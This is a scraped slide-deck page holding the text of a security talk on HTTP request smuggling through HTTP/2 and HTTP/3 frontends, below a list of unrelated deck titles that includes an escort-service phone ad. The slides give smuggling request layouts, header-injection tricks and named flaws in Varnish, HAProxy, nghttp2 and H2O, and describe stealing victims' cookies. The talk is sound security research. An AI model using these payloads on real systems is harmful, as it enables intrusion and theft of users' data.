Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a series
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
 
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
 
How to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfHow to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdf
 
Best Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfBest Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdf
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdf
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdf
 

HTTP Request Smuggling via higher HTTP versions

  • 1. Emil Lerner HTTP Request Smuggling via higher HTTP versions
  • 2. Emil Lerner independentsecurityresearcher CTO at WunderFund.io Bushwhackers CTF team @emil_lerner @neex
  • 4. Reverse proxy HTTP Response HTTP Request Client HTTP Response HTTP Request Frontend Server Backend Server
  • 5. HTTP keep-alive HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 Client Server
  • 6. HTTP/1.1 body transfer Content-Length header Content-Length: 100 Here goes 100 bytes of the request body. Transfer-Encoding: chunked ff 10 0 Here goes 255-byte chunk Another chunk Chunked encoding
  • 7. HTTP keep-alive (to backend) HTTP Response 1 HTTP Request 1 HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 HTTP Response 2 HTTP Request 2 Single backend connection Client2 connection Client1 connection Client1 Client2 Frontend Server Backend Server
  • 8. HTTP Request Smuggling Old & known attack Gained a lot of attention after James Kettle's talk on BH USA 2019 He discovered a lot of new techniques
  • 9. HTTP Request Smuggling An attacker sends a malicious request It is parsed as a single request by the frontend and is forwarded to the backend Backend parses it as two separate requests
  • 10. POST / HTTP/1.1 Content-Length: 100 0 Transfer-Encoding : chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request HTTP Request Smuggling
  • 11. HTTP Request Smuggling It's all about Content-Length / Transfer-Encoding Transfer-Encoding has precedence We need to "smuggle" Transfer-Encoding to backend unprocessed by the frontend
  • 12. HTTP Request Smuggling POST / HTTP/1.1 Content-Length: 100 Transfer-Encoding: identity, 0 chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request
  • 13. Exploitation Accessing internal endpoints Cache poisoning Stealing other users’ requests
  • 14. Exploitation: stealing requests Attacker→Frontend Victim→Frontend GET / HTTP/1.1 ... POST /save HTTP/1.1 Transfer-Encoding : chunked GET / HTTP/1.1 Cookie: secret GET / HTTP/1.1 Transfer-Encoding : chunked ... POST /save HTTP/1.1 data=GET / HTTP/1.1 Cookie: secret Frontend→Backend
  • 15. Exploitation: stealing requests The victim's request is appended to ours Most frameworks are OK with newlines in forms Victim's cookies are saved to our profile, PMs or other places where we can view them later
  • 16. HTTP/2 overview Widely adopted by now Binary protocol (no special chars) Almost always terminated at frontend
  • 17. HTTP/2 termination :status 200 PRI * HTTP/2.0 <binary> :method GET HTTP/1.1 200 OK GET / HTTP/1.1 Frontend Backend Client
  • 18. HTTP/2 body transfer Request body is transferred in binary frames Content-Length not required, but allowed Transfer-Encoding: chunked has no effect
  • 19. Potential bug #1: content-length conflicts actual length Client→Frontend :method POST :authority host.com XGET /internal HTTP/1.1 ... content-length: 1 POST / HTTP/1.1 Host: host.com Content-Length: 1 XGET /internal HTTP/1.1 ... Frontend→Backend body
  • 20. Potential bug #2: no content-length forwarding Client→Frontend :method :authority host.com GET /internal HTTP/1.1 GET GET / HTTP/1.1 Host: host.com GET /internal HTTP/1.1 Frontend→Backend body
  • 21. Potential bug #3: content-length conflicting transfer-encoding Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding: chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer-Encoding: chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
  • 22. HTTP/2 header validation Headers names and values are binary strings Names and values can contain newlines Names can contain colons
  • 23. Potential bug #4: newlines in headers Client→Frontend :method GET :authority host.com x: ... ⏎⏎GET /internal HTTP/1.1 GET / HTTP/1.1 Host: host.com X: GET /internal HTTP/1.1 ... Frontend→Backend
  • 24. Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding : chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 transfer-encoding : chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
  • 25. Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer_encoding: chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer_Encoding: chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
  • 26. Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding: chunKed POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer-Encoding: chunKed 0 GET /internal HTTP/1.1 ... Frontend→Backend body
  • 27. What does the RFC say? RFC 7540 mentions Intermediary Encapsulation Attacks in 10.3 Basically says "implementation must reject things it can't handle" :) Explicitly mentions newlines and x00
  • 28. Detection idea #1: make backend expect more data Craft a request such that Backend expects more data Frontend thinks it sent the whole request The request will hang Implemented in James Kettle's Burp plugin (for HTTP/1.1)
  • 29. Detection idea #1: make backend expect more data :method POST content-length: 5 h:⏎transfer-encoding:chunked fff Frontend interprets this Backend interprets this Frontend thinks body is finished Backend expects more data and hangs
  • 30. Chunked encoding should never be parsed in HTTP/2 If the response depends on the chunked encoding validness, it is a possible vulnerability There're some false positives Detection idea #2: chunked body parsing
  • 31. Detection idea #2: chunked body parsing :status 400 :method POST invalid chunked body transfer-encoding : chunked HTTP/1.1 400 POST / HTTP/1.1 transfer-encoding : chunked invalid chunked body Frontend Backend Client
  • 32. Detection idea #3: content-length parsing Send something like x:x⏎content-length:1000 If the response depends on the value, it's a possible vulnerability Even more false positives :(
  • 33. False positive scenario HTTP/2 HTTP/2 termination HTTP/1 processing HTTP/1.1 Frontend Backend Client
  • 34. Varnish flaw Client→Varnish :method GET :authority host.com GET /internal HTTP/1.1 ... content-length: 0 GET / HTTP/1.1 Host: host.com content-length: 0 GET /internal HTTP/1.1 ... Varnish→Backend body
  • 35. Potential bug #6: RFC 8441 Designed for WebSockets over HTTP/2 A client sends CONNECT method and sets the :protocol special header Intermediary translates it to Upgrade
  • 36. Haproxy & nghttp2 flaws Client→Frontend :method :authority host.com GET /internal HTTP/1.1 ... CONNECT :protocol websocket GET / HTTP/1.1 Host: host.com Connection: upgrade Upgrade: websocket GET /internal HTTP/1.1 ... Frontend→Backend body
  • 37. Open problem: one-way size discrepancy Attacks work if the backend reads less data than the frontend Detection methods work if the backend expects more data What if the first is achievable, but the second is not possible?
  • 38. Client→Frontend Frontend→Backend H2O http3 (QUIC) flaw :method POST content-length: 100 0 GET /internal HTTP/1.1 ... x:x⏎transfer-encoding:chunked POST / HTTP/1.1 Content-length: 100 X: x Transfer-Encoding: chunked 0 GET /internal HTTP/1.1 ... body
  • 39. Automation I've implemented http2smugl tool It performs automatic vulnerability detection using the discussed methods Also it supports sending "invalid" queries via custom HTTP/2 implementation
  • 40. Further research needed HTTP/1 special headers, writing to closed streams, HPACK and >40 implementations not researched Stable detection methods wanted Putting space + path into :method can lead to hitting internal endpoints and Host override